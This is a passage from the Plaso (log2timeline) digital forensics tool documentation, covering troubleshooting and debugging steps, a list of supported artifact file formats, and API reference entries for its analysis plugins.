• On what type of media is your source data stored? What type of media are you writing to? – A local disk, a removable disk or network storage? – Both removable media and network storage can add additional latency to reads and writes making overall processing slow. It is recommended to at least write to local low-latency media. • Are you seeing workers being killed? – Respawning of workers creates more overhead and slower processing times. – Workers being killed typically indicates one of the parser misbehaving. If the worker is consuming a high amount of memory, also see section “High memory usage” below. • Are you running Plaso in a VM or Docker container?

3.2 Isolating errors

The most important part of troubleshooting is isolating the error. Can you run the tests successfully? $ python run_tests.py ... ------Ran 585 tests in 66.530s

If an error occurs when processing a storage media image try to run with the storage image media file and/or the file system directly mounted. Mounting the storage image media file will bypass libraries (modules) supporting the storage image media format. Running source_analyzer.py can help pinpointing the issue, e.g. PYTHONPATH=. python scripts/source_analyzer.py --no-auto-recurse

Try: • logging to a log file log2timeline.py --log-file=log2timeline.log ...; • running in debug mode log2timeline.py --debug ...; • running in single process mode this will bypass any issues with multi processing log2timeline.py --single-process ...; • mounting the file system as well to bypass libraries (modules) supporting the file system, e.g. the SleuthKit and pytsk; • running in single process and debug mode, see section below.

26 Chapter 3. Troubleshooting Plaso (log2timeline), Release 20210606

3.3 Producing debug logs

To produce debugging logs, run log2timeline like so: log2timeline.py --log-file=log2timeline_problem. log.gz --debug. This will create multiple, gzip-compressed log files. There will be one called log2timeline_problem.log.gz containing logs from the main log2timeline process, and one log file for each worker process. Note that the .gz file suffix is important, as it triggers Plaso to compress the log output. In an uncompressed form,the logs are very large. The compressed logs can be reviewed with unzip tools like zless and zgrep.

3.4 Import errors

It sometimes happen that the tests fail with an import error e.g. ImportError: Failed to import test module: plaso.parsers.winreg_plugins.shutdown_test Traceback(most recent call last): File "/usr/lib64/python3.7/unittest/loader.py", line 254, in _find_tests module= self._get_module_from_name(name) File "/usr/lib64/python3.7/unittest/loader.py", line 232, in _get_module_from_name __import__(name) File "./plaso/parsers/__init__.py", line4, in from plaso.parsers import asl ImportError: cannot import name asl

This does not necessarily mean that the code cannot find the asl module. The import error can mask an underlying issue. Try running the following commands in a Python shell: $ python import sys sys.path.insert(0, u'.') import plaso

It also sometimes means that you have multiple versions of Plaso installed on your system and Python tries to import for the wrong one.

3.5 Crashes, hangs and tracebacks

In the context of Plaso crashes and tracebacks have different meanings: • crash; an error that causes an abrupt termination of the program you were running e.g. a segfault (SIGSEGV) • traceback; the back trace of an error that was caught by an exception handler that can cause a termination of the program you were running

3.3. Producing debug logs 27 Plaso (log2timeline), Release 20210606

3.5.1 A worker segfault-ing

Since Plaso relies on several compiled dependencies it is possible that a worker segfault (SIGSEGV). As part of the 1.3 pre-release bug hunting a SIGSEGV signal handler was added however this process turned out, as expected, unreliable. However it added an interesting side effect that is very useful for debugging. If the SIGSEGV signal handler is enable the worker process typically remains in the “running” state but stops producing event object. What happens under the hood is that the SIGSEGV signal is caught but the worker is unable to cleanly terminate. Because of this “frozen” state of the worker it is very easy to attach a debugger e.g. gdb python -p PID. A kill -11 PID however seems to be cleanly handled by the SIGSEGV signal handler and puts the worker into “error” status.

3.5.2 A worker gives a killed status

This typically indicates that the worker was killed (SIGKILL) likely by an external process e.g the Out Of Memory (OOM) killer. Your system logs might indicate why the worker was killed.

3.5.3 Which processes are running

The following command help you determine which Plaso processes are running on your system: Linux: top -p `ps -ef | grep log2timeline.py | grep python | awk '{ print $2 }' | tr '\n'' ,' |␣

˓→sed 's/,$//'`

MacOS: ps aux | grep log2timeline.py | grep python | awk '{print $2}' | tr '\n'' ,' | sed 's/,$/

˓→/'

3.5.4 Analyzing crashes with single process and debug mode

In single process and debug mode log2timeline.py --debug --single-process ... log2timeline will run a Python debug shell (pdb) when an uncaught Python exception is raised. Use: • w to print the frames. • u to go up one frame or d to go down one frame. • l to print source code of the current frame. Note that typically the top-level (oldest) frame will contain the exception: p exception

Note that inside pdb you can run any Python commands including loading new libraries e.g. for troubleshooting. You can prepend commands with an exclamation mark (!) to indicate that you want to run a Python command as an opposed to a debug shell one. To print the attributes of the current object you are looking for.

28 Chapter 3. Troubleshooting Plaso (log2timeline), Release 20210606

!self.__dict__

To print the current argument stack to see what arguments are available to you. args

3.5.5 Analyzing crashes with gdb

Once you have isolated the file that causes the crash and you cannot share the file you can generate a backtracethat can help us fix the error. First make sure you have the debug symbols installed. Then run Plaso as a single process with gdb: gdb --ex r --args log2timeline.py --single-process -d docs/sources/Troubleshooting.md --

˓→storage-file timeline.plaso file_that_crashes_the_tool

To generate a back trace: bt

Note that often the first 10 lines of the back trace are sufficient information. An alternative approach is to attach a debugger to it once the program is running: gdb python -p PID

Where PID is the process identifier of the program. Once the debugger is attached continue running: c

Wait until the crash occurs and generate a back trace. Also see: DebuggingWithGdb, gdb Support

3.6 High memory usage

Plaso consists of various components. It can happen that one of these components uses a lot of memory or even leaks memory. In these cases it is important to isolate the error, see before, to track down what the possible culprit is. Also see: Profiling memory usage Also see Troubleshooting Plaso Issues - Memory Edition

3.6. High memory usage 29 Plaso (log2timeline), Release 20210606

3.7 MacOS specific issues

3.7.1 How do I remove a Plaso installation

If you installed Plaso via the installer script in the .dmg, the MacOS package manager can be used to remove a Plaso installation. For more information about using the MacOS package manager see: • http://superuser.com/questions/36567/how-do-i-uninstall-any-apple-pkg-package-file

3.7.2 PyParsing errors

MacOS bundles its own version of PyParsing that is older than the version required by Plaso. Fix this by using the special wrapper scripts (log2timeline**.sh**, et. al.), or if you don’t want to do that, manipulate PYTHONPATH so that the newer version is loaded. This is detailed on the MacOS development page.

3.7.3 ImportError: cannot import name dependencies

There can be numerous reasons for imports to fail on MacOS here we describe some of the more common ones encountered: • clashing versions; you have multiple clashing versions installed on your system check the Python site-packages paths such as: /Library/Python/2.7/site-packages/, /usr/local/lib/python2.7/site-packages/ . • you used pip without virtualenv and have messed up your site-packages

3.7.4 You used pip without virtualenv and have messed up your site-packages

The use of pip without virtualenv on MacOS is strongly discouraged, unless you are very familiar with these tools. You might have already messed up your site-packages beyond a state of a timely repair.

3.8 Ubuntu Linux specific issues

3.8.1 Origin of an installed package

To determine the origin of an installed package apt-cache showpkg

3.9 Windows specific issues

3.9.1 Not a valid Win32 application

When I load one of the Python modules I get: ImportError: DLL load failed:%1 is not a valid Win32 application.

30 Chapter 3. Troubleshooting Plaso (log2timeline), Release 20210606

This means your Python interpreter (on Windows) cannot load a Python module since the module is not a valid Win32 DLL file. One cause of this could be mismatch between a 64-bit Python and 32-bit build module (or viceversa).

3.9.2 Unable to find an entry point in DLL

When I try to import one of the Python-bindings I get: ImportError: DLL load failed: The specified procedure could not be found.

Make sure the DLL is built for the right WINAPI version, check the value of WINVER of your build.

3.9.3 setup.py and build errors

Unable to find vcvarsall.bat

When running setup.py I get: error: Unable to find vcvarsall.bat

Make sure the environment variable VS90COMNTOOLS is set, e.g. for Visual Studio 2010: set VS90COMNTOOLS=%VS100COMNTOOLS%

Or set it to a path: set VS90COMNTOOLS="C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\Tools\"

ValueError: [u’path’] when running setup.py

When running setup.py I get: ValueError:[u'path']

Try running the command from the “Windows SDK 7.1” or “Visual Studio” Command Prompt.

I’m getting linker “unresolved externals” errors when running setup.py

If you’re building a 64-bit version of a Python binding Visual Studio 2010 express make sure to use “Windows SDK 7.1 Command Prompt”.

3.9. Windows specific issues 31 Plaso (log2timeline), Release 20210606

32 Chapter 3. Troubleshooting CHAPTER FOUR

SUPPORTED FORMATS

The information below is based of version 20210213

4.1 Storage media image file formats

Storage media image file format support is provided by dfvfs.

4.2 Volume system formats

Volume system format support is provided by dfvfs.

4.3 File system formats

File System Format support is provided by dfvfs.

4.4 File formats

• Apple System Log (ASL) • Android usage-history (app usage) • Basic Security Module (BSM) • Bencode files • Chrome Disk Cache Format • Chrome preferences • CUPS IPP • Extensible Storage Engine (ESE) Database File (EDB) format using libesedb • Firefox Cache • Java WebStart IDX • Jump Lists .customDestinations-ms files • MacOS Application firewall

33 Plaso (log2timeline), Release 20210606

• MacOS Keychain • MacOS Securityd • MacOS Wifi • mactime logs • McAfee Anti-Virus Logs • Microsoft Internet Explorer History File Format (also known as MSIE 4 - 9 Cache Files or index.dat) using libmsiecf • Microsoft IIS log files • NTFS $MFT and $UsnJrnl:$J using libfsntfs • OLE Compound File using libolecf • Opera Browser history • OpenXML • Pcap files • Portable Executable (PE) files using pefile • PL SQL cache file (PL-SQL developer recall files) • Popularity Contest log • Property list (plist) format using plistlib • Restore Point logs (rp.log) • Safari Binary Cookies • SCCM client logs • SELinux audit logs • SkyDrive log and error log files • SQLite database format using SQLite • Symantec AV Corporate Edition and Endpoint Protection log • Syslog • utmp, utmpx • Windows Event Log (EVT) using libevt • Windows Firewall • Windows Job files (also known as “at jobs”) • Windows Prefetch files • Windows Recycle bin (INFO2 and $I/$R) • Windows NT Registry File (REGF) using libregf • Windows Shortcut File (LNK) format using liblnk (including shell item support) • Windows XML Event Log (EVTX) using libevtx • Xchat and Xchat scrollback files • Zsh history files

34 Chapter 4. Supported Formats Plaso (log2timeline), Release 20210606

4.5 Bencode file formats

• Transmission BitTorrent activity file • uTorrent active torrent file

4.6 Browser cookie formats

• Google Analytics __utma cookie • Google Analytics __utmb cookie • Google Analytics __utmt cookie • Google Analytics __utmz cookie

4.7 Compound ZIP file formats

• OpenXML (OXML) file

4.8 ESE database file formats

• Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file • System Resource Usage Monitor (SRUM) ESE database file • Windows 8 File History ESE database file

4.9 OLE Compound File formats

• Automatic destinations jump list OLE compound file (.automaticDestinations-ms) • Document summary information (\0x05DocumentSummaryInformation) • Summary information (\0x05SummaryInformation) (top-level only)

4.10 Property list (plist) formats

• Airport plist file • Apple account information plist file • Bluetooth plist file • iPod, iPad and iPhone plist file • Launchd plist file • MacOS installation history plist file • MacOS software update plist file

4.5. Bencode file formats 35 Plaso (log2timeline), Release 20210606

• MacOS user plist file • Safari history plist file • Spotlight plist file • Spotlight volume configuration plist file • TimeMachine plist file

4.11 SQLite database file formats

• Android call history SQLite database (contacts2.db) file • Android text messages (SMS) SQLite database (mmssms.dbs) file • Android WebViewCache SQLite database file • Android WebView SQLite database file • Google Chrome 17 - 65 cookies SQLite database file • Google Chrome 27 and later history SQLite database file • Google Chrome 66 and later cookies SQLite database file • Google Chrome 8 - 25 history SQLite database file • Google Chrome autofill SQLite database (Web Data) file • Google Chrome extension activity SQLite database file • Google Drive snapshot SQLite database (snapshot.db) file • Google Hangouts conversations SQLite database (babel.db) file • iOS Kik messenger SQLite database (kik.sqlite) file • Kodi videos SQLite database (MyVideos.db) file • MacOS and iOS iMessage database (chat.db, sms.db) file • MacOS application usage SQLite database (application_usage.sqlite) file • MacOS document revisions SQLite database file • MacOS Duet / KnowledgeC SQLites database file • MacOS launch services quarantine events database SQLite database file • MacOS MacKeeper cache SQLite database file • MacOS Notes SQLite database (NotesV7.storedata) file • MacOS Notification Center SQLite database file • MacOS Transaprency, Consent, Control (TCC) SQLite database (TCC.db) file • Mozilla Firefox cookies SQLite database file • Mozilla Firefox downloads SQLite database (downloads.sqlite) file • Mozilla Firefox history SQLite database (places.sqlite) file • Safari history SQLite database (History.db) file • Skype SQLite database (main.db) file

36 Chapter 4. Supported Formats Plaso (log2timeline), Release 20210606

• Tango on Android profile SQLite database file • Tango on Android TC SQLite database file • Twitter on Android SQLite database file • Twitter on iOS 8 and later SQLite database (twitter.db) file • Windows 10 Timeline SQLite database (ActivitiesCache.db) file • Zeitgeist activity SQLite database file

4.12 Syslog file formats

• Cron syslog line • SSH syslog line

4.13 Windows Registry formats

• Application Compatibility Cache Registry data • Background Activity Moderator (BAM) Registry data • BagMRU (or ShellBags) Registry data • Boot Execution Registry data • CCleaner Registry data • Microsoft Internet Explorer zone settings Registry data • Microsoft Office MRU Registry data • Microsoft Outlook search MRU Registry data • Most Recently Used (MRU) Registry data • Run and run once Registry data • Security Accounts Manager (SAM) users Registry data • Terminal Server Client Connection Registry data • Terminal Server Client Most Recently Used (MRU) Registry data • User Assist Registry data • Windows boot verification Registry data • Windows drivers and services Registry data • Windows Explorer mount points Registry data • Windows Explorer Programs Cache Registry data • Windows Explorer typed URLs Registry data • Windows last shutdown Registry data • Windows log-on Registry data • Windows network drives Registry data • Windows networks (NetworkList) Registry data

4.12. Syslog file formats 37 Plaso (log2timeline), Release 20210606

• Windows Task Scheduler cache Registry data • Windows time zone Registry data • Windows USB device Registry data • Windows USB Plug And Play Manager USBStor Registry data • Windows version (product) Registry data • WinRAR History Registry data

4.14 Hashers Supported

• MD5 • SHA1 • SHA256

38 Chapter 4. Supported Formats CHAPTER FIVE

PLASO PACKAGE

5.1 Subpackages

5.1.1 plaso.analysis package

Submodules plaso.analysis.browser_search module

A plugin that extracts browser history from events. class plaso.analysis.browser_search.BrowserSearchPlugin Bases: plaso.analysis.interface.AnalysisPlugin Analyze browser search entries from events. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns analysis report. Return type AnalysisReport ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'browser_search'

39 Plaso (log2timeline), Release 20210606 plaso.analysis.chrome_extension module

A plugin that gather extension IDs from Chrome history browser. class plaso.analysis.chrome_extension.ChromeExtensionPlugin Bases: plaso.analysis.interface.AnalysisPlugin Convert Chrome extension IDs into names, requires Internet connection. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns analysis report. Return type AnalysisReport ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event to examine. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'chrome_extension' plaso.analysis.definitions module

This file contains the definitions for analysis plugins. plaso.analysis.hash_tagging module

This file contains the interface for analysis plugins. class plaso.analysis.hash_tagging.HTTPHashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0) Bases: plaso.analysis.hash_tagging.HashAnalyzer Interface for hash analysis thread that uses HTTP(S) abstract Analyze(hashes) Analyzes a list of hashes. Parameters hashes (list[str]) – hashes to look up. Returns analysis results. Return type list[HashAnalysis] MakeRequestAndDecodeJSON(url, method, **kwargs) Make a HTTP request and decode the results as JSON. Parameters

40 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• url (str) – URL to make a request to. • method (str) – HTTP method to used to make the request. GET and POST are supported. • kwargs – parameters to the requests .get() or post() methods, depending on the value of the method parameter. Returns body of the HTTP response, decoded from JSON. Return type dict[str, object] Raises • ConnectionError – If it is not possible to connect to the given URL, or it the request returns a HTTP error. • ValueError – If an invalid HTTP method is specified. class plaso.analysis.hash_tagging.HashAnalysis(subject_hash, hash_information) Bases: object Analysis information about a hash. hash_information object containing information about the hash. Type object subject_hash hash that was analyzed. Type str class plaso.analysis.hash_tagging.HashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0) Bases: threading.Thread Interface of a hash analyzer threads. analyses_performed number of analysis batches completed by this analyzer. Type int hashes_per_batch maximum number of hashes to analyze at once. Type int lookup_hash name of the hash attribute to look up. Type str seconds_spent_analyzing number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.) Type int wait_after_analysis number of seconds the analyzer will sleep for after analyzing a batch of hashes. Type int abstract Analyze(hashes) Analyzes a list of hashes.

5.1. Subpackages 41 Plaso (log2timeline), Release 20210606

Parameters hashes (list[str]) – list of hashes to look up. Returns list of results of analyzing the hashes. Return type list[HashAnalysis] EMPTY_QUEUE_WAIT_TIME = 4 SUPPORTED_HASHES = [] SetLookupHash(lookup_hash) Sets the lookup hash to query. Parameters lookup_hash (str) – name of the hash attribute to look up. Raises ValueError – if the lookup hash is not supported. SignalAbort() Instructs the hash analyzer to abort. run() The method called by the threading library to start the thread. class plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin(analyzer_class) Bases: plaso.analysis.interface.AnalysisPlugin An interface for plugins that tag events based on the source file hash. An implementation of this class should be paired with an implementation of the HashAnalyzer interface. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfVFS. Returns report. Return type AnalysisReport DATA_TYPES = [] DEFAULT_QUEUE_TIMEOUT = 4 EstimateTimeRemaining() Estimates how long until all hashes have been analyzed. Returns estimated number of seconds until all hashes have been analyzed. Return type int ExamineEvent(mediator, event, event_data, event_data_stream) Evaluates whether an event contains the right data for a hash lookup. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfVFS. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. abstract GenerateLabels(hash_information) Generates a list of strings to tag events with.

42 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters hash_information (bool) – response from the hash tagging analyzer that indicates that the file hash was present or not. Returns list of labels to apply to event. Return type list[str] SECONDS_BETWEEN_STATUS_LOG_MESSAGES = 30 SetLookupHash(lookup_hash) Sets the hash to query. Parameters lookup_hash (str) – name of the hash attribute to look up. plaso.analysis.interface module

This file contains the interface for analysis plugins. class plaso.analysis.interface.AnalysisPlugin Bases: object Class that defines the analysis plugin interface. CompileReport(mediator) Compiles a report of the analysis. After the plugin has received every copy of an event to analyze this function will be called so that the report can be assembled. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns report. Return type AnalysisReport abstract ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'analysis_plugin' TEST_PLUGIN = False property plugin_name name of the plugin. Type str

5.1. Subpackages 43 Plaso (log2timeline), Release 20210606 plaso.analysis.logger module

The analysis sub module logger. plaso.analysis.manager module

This file contains the analysis plugin manager class. class plaso.analysis.manager.AnalysisPluginManager Bases: object Analysis plugin manager. classmethod DeregisterPlugin(plugin_class) Deregisters an analysis plugin class. The analysis plugin classes are identified by their lower case name. Parameters plugin_class (type) – class of the analysis plugin. Raises KeyError – if an analysis plugin class is not set for the corresponding name. classmethod GetAllPluginInformation() Retrieves a list of the registered analysis plugins. Returns the name, docstring and type string of each analysis plugin in alphabetical order. Return type list[tuple[str, str, str]] classmethod GetPluginNames() Retrieves the analysis plugin names. Returns analysis plugin names. Return type list[str] classmethod GetPluginObjects(plugin_names) Retrieves the plugin objects. Parameters plugin_names (list[str]) – names of plugins that should be retrieved. Returns analysis plugins per name. Return type dict[str, AnalysisPlugin] classmethod GetPlugins() Retrieves the registered analysis plugin classes. Yields tuple – containing: str: name of the plugin type: plugin class classmethod RegisterPlugin(plugin_class) Registers an analysis plugin class. Then analysis plugin classes are identified based on their lower case name. Parameters plugin_class (type) – class of the analysis plugin. Raises KeyError – if an analysis plugin class is already set for the corresponding name.

44 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

classmethod RegisterPlugins(plugin_classes) Registers analysis plugin classes. The analysis plugin classes are identified based on their lower case name. Parameters plugin_classes (list[type]) – classes of the analysis plugin. Raises KeyError – if an analysis plugin class is already set for the corresponding name. plaso.analysis.mediator module

The analysis plugin mediator object. class plaso.analysis.mediator.AnalysisMediator(session, storage_writer, knowledge_base, data_location=None) Bases: object Analysis plugin mediator. last_activity_timestamp timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event tag. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled). Type int number_of_produced_analysis_reports number of produced analysis reports. Type int number_of_produced_event_tags number of produced event tags. Type int GetDisplayNameForPathSpec(path_spec) Retrieves the display name for a path specification. Parameters path_spec (dfvfs.PathSpec) – path specification. Returns human readable version of the path specification. Return type str GetUsernameForPath(path) Retrieves a username for a specific path. This is determining if a specific path is within a user’s directory and returning the username of theuserif so. Parameters path (str) – path. Returns username or None if the path does not appear to be within a user’s directory. Return type str ProduceAnalysisReport(plugin) Produces an analysis report. Parameters plugin (AnalysisPlugin) – plugin.

5.1. Subpackages 45 Plaso (log2timeline), Release 20210606

ProduceAnalysisWarning(message, plugin_name) Produces an analysis warning. Parameters • message (str) – message of the warning. • plugin_name (str) – name of the analysis plugin to which the warning applies. ProduceEventTag(event_tag) Produces an event tag. Parameters event_tag (EventTag) – event tag. SignalAbort() Signals the analysis plugins to abort. property abort True if the analysis should be aborted. Type bool property data_location path to the data files. Type str property operating_system operating system or None if not set. Type str plaso.analysis.nsrlsvr module

Analysis plugin to look up file hashes in nsrlsvr and tag events. class plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin Analysis plugin for looking up hashes in nsrlsvr. DATA_TYPES = ['fs:stat', 'fs:stat:ntfs'] DEFAULT_LABEL = 'nsrl_present' GenerateLabels(hash_information) Generates a list of strings that will be used in the event tag. Parameters hash_information (bool) – response from the hash tagging analyzer that indicates that the file hash was present or not. Returns list of labels to apply to event. Return type list[str] NAME = 'nsrlsvr' SetHost(host) Sets the address or hostname of the server running nsrlsvr. Parameters host (str) – IP address or hostname to query. SetLabel(label) Sets the tagging label. Parameters label (str) – label to apply to events extracted from files that are present in nsrlsvr.

46 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SetPort(port) Sets the port where nsrlsvr is listening. Parameters port (int) – port to query. TestConnection() Tests the connection to nsrlsvr. Returns True if nsrlsvr instance is reachable. Return type bool class plaso.analysis.nsrlsvr.NsrlsvrAnalyzer(hash_queue, hash_analysis_queue, **kwargs) Bases: plaso.analysis.hash_tagging.HashAnalyzer Analyzes file hashes by consulting an nsrlsvr instance. analyses_performed number of analysis batches completed by this analyzer. Type int hashes_per_batch maximum number of hashes to analyze at once. Type int seconds_spent_analyzing number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.) Type int wait_after_analysis number of seconds the analyzer will sleep for after analyzing a batch of hashes. Type int Analyze(hashes) Looks up file hashes in nsrlsvr. Parameters hashes (list[str]) – hash values to look up. Returns analysis results, or an empty list on error. Return type list[HashAnalysis] SUPPORTED_HASHES = ['md5', 'sha1'] SetHost(host) Sets the address or hostname of the server running nsrlsvr. Parameters host (str) – IP address or hostname to query. SetPort(port) Sets the port where nsrlsvr is listening. Parameters port (int) – port to query. TestConnection() Tests the connection to nsrlsvr. Checks if a connection can be set up and queries the server for the MD5 of an empty file and expects a response. The value of the response is not checked. Returns True if nsrlsvr instance is reachable. Return type bool

5.1. Subpackages 47 Plaso (log2timeline), Release 20210606 plaso.analysis.sessionize module

A plugin to tag events according to rules in a tag file. class plaso.analysis.sessionize.SessionizeAnalysisPlugin Bases: plaso.analysis.interface.AnalysisPlugin Analysis plugin that labels events by session. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns analysis report. Return type AnalysisReport ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an EventObject and tags it as part of a session. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event to examine. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'sessionize' SetMaximumPause(maximum_pause_minutes) Sets the maximum pause interval between events to consider a session. Parameters maximum_pause_minutes (int) – maximum gap between events that are part of the same session, in minutes. plaso.analysis.tagging module

Analysis plugin that labels events according to rules in a tagging file. class plaso.analysis.tagging.TaggingAnalysisPlugin Bases: plaso.analysis.interface.AnalysisPlugin Analysis plugin that labels events according to rules in a tagging file. ExamineEvent(mediator, event, event_data, event_data_stream) Labels events according to the rules in a tagging file. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event to examine. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'tagging'

48 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

SetAndLoadTagFile(tagging_file_path) Sets the tagging file to be used by the plugin. Parameters tagging_file_path (str) – path of the tagging file. plaso.analysis.test_memory module

Analysis plugin for testing exceeding memory consumption. class plaso.analysis.test_memory.TestMemoryAnalysisPlugin Bases: plaso.analysis.interface.AnalysisPlugin Analysis plugin for testing memory consumption. CompileReport(mediator) Compiles an analysis report. Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. Returns analysis report. Return type AnalysisReport ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'test_memory' TEST_PLUGIN = True

plaso.analysis.unique_domains_visited module

A plugin to generate a list of domains visited. class plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPlugin Bases: plaso.analysis.interface.AnalysisPlugin A plugin to generate a list all domains visited. This plugin will extract domains from browser history events extracted by Plaso. The list produced can be used to quickly determine if there has been a visit to a site of interest, for example, a known phishing site. ExamineEvent(mediator, event, event_data, event_data_stream) Analyzes an event and extracts domains from it. We only evaluate straightforward web history events, not visits which can be inferred by TypedURLs, cookies or other means. Parameters • mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.

5.1. Subpackages 49 Plaso (log2timeline), Release 20210606

• event (EventObject) – event to examine. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. NAME = 'unique_domains_visited' plaso.analysis.viper module

Analysis plugin to look up files in Viper and tag events. class plaso.analysis.viper.ViperAnalysisPlugin Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin An analysis plugin for looking up SHA256 hashes in Viper. DATA_TYPES = ['pe:compilation:compilation_time'] GenerateLabels(hash_information) Generates a list of labels that will be used in the event tag. Parameters hash_information (dict[str, object]) – JSON decoded contents of the result of a Viper lookup, as produced by the ViperAnalyzer. Returns list of labels to apply to events. Return type list[str] NAME = 'viper' SetHost(host) Sets the address or hostname of the server running Viper server. Parameters host (str) – IP address or hostname to query. SetPort(port) Sets the port where Viper server is listening. Parameters port (int) – port to query. SetProtocol(protocol) Sets the protocol that will be used to query Viper. Parameters protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’. Raises ValueError – if the protocol is not supported. TestConnection() Tests the connection to the Viper server. Returns True if the Viper server instance is reachable. Return type bool class plaso.analysis.viper.ViperAnalyzer(hash_queue, hash_analysis_queue, **kwargs) Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer Class that analyzes file hashes by consulting Viper. REST API reference: https://viper-framework.readthedocs.io/en/latest/usage/web.html#api Analyze(hashes) Looks up hashes in Viper using the Viper HTTP API. Parameters hashes (list[str]) – hashes to look up.

50 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Returns hash analysis. Return type list[HashAnalysis] Raises RuntimeError – If no host has been set for Viper. SUPPORTED_HASHES = ['md5', 'sha256'] SUPPORTED_PROTOCOLS = ['http', 'https'] SetHost(host) Sets the address or hostname of the server running Viper server. Parameters host (str) – IP address or hostname to query. SetPort(port) Sets the port where Viper server is listening. Parameters port (int) – port to query. SetProtocol(protocol) Sets the protocol that will be used to query Viper. Parameters protocol (str) – protocol to use to query Viper. Either ‘http’ or ‘https’. Raises ValueError – if the protocol is not supported. TestConnection() Tests the connection to the Viper server. Returns True if the Viper server instance is reachable. Return type bool plaso.analysis.virustotal module

Analysis plugin to look up files in VirusTotal and tag events. class plaso.analysis.virustotal.VirusTotalAnalysisPlugin Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin An analysis plugin for looking up hashes in VirusTotal. DATA_TYPES = ['pe:compilation:compilation_time'] EnableFreeAPIKeyRateLimit() Configures Rate limiting for queries to VirusTotal. The default rate limit for free VirusTotal API keys is 4 requests per minute. GenerateLabels(hash_information) Generates a list of strings that will be used in the event tag. Parameters hash_information (dict[str, object]) – the JSON decoded contents of the result of a VirusTotal lookup, as produced by the VirusTotalAnalyzer. Returns strings describing the results from VirusTotal. Return type list[str] NAME = 'virustotal' SetAPIKey(api_key) Sets the VirusTotal API key to use in queries. Parameters api_key (str) – VirusTotal API key

5.1. Subpackages 51 Plaso (log2timeline), Release 20210606

TestConnection() Tests the connection to VirusTotal Returns True if VirusTotal is reachable. Return type bool class plaso.analysis.virustotal.VirusTotalAnalyzer(hash_queue, hash_analysis_queue, **kwargs) Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer Class that analyzes file hashes by consulting VirusTotal. The API is documented here: https://developers.virustotal.com/reference Analyze(hashes) Looks up hashes in VirusTotal using the VirusTotal HTTP API. Parameters hashes (list[str]) – hashes to look up. Returns analysis results. Return type list[HashAnalysis] Raises RuntimeError – If the VirusTotal API key has not been set. SUPPORTED_HASHES = ['md5', 'sha1', 'sha256'] SetAPIKey(api_key) Sets the VirusTotal API key to use in queries. Parameters api_key (str) – VirusTotal API key TestConnection() Tests the connection to VirusTotal Returns True if VirusTotal is reachable. Return type bool plaso.analysis.windows_services module

A plugin to enable quick triage of Windows Services. class plaso.analysis.windows_services.WindowsService(*args: Any, **kwargs: Any) Bases: yaml. Class to represent a Windows Service. image_path value of the ImagePath value of the service key. Type str name name of the service Type str object_name value of the ObjectName value of the service key. Type str service_dll value of the ServiceDll value in the service’s Parameters subkey.

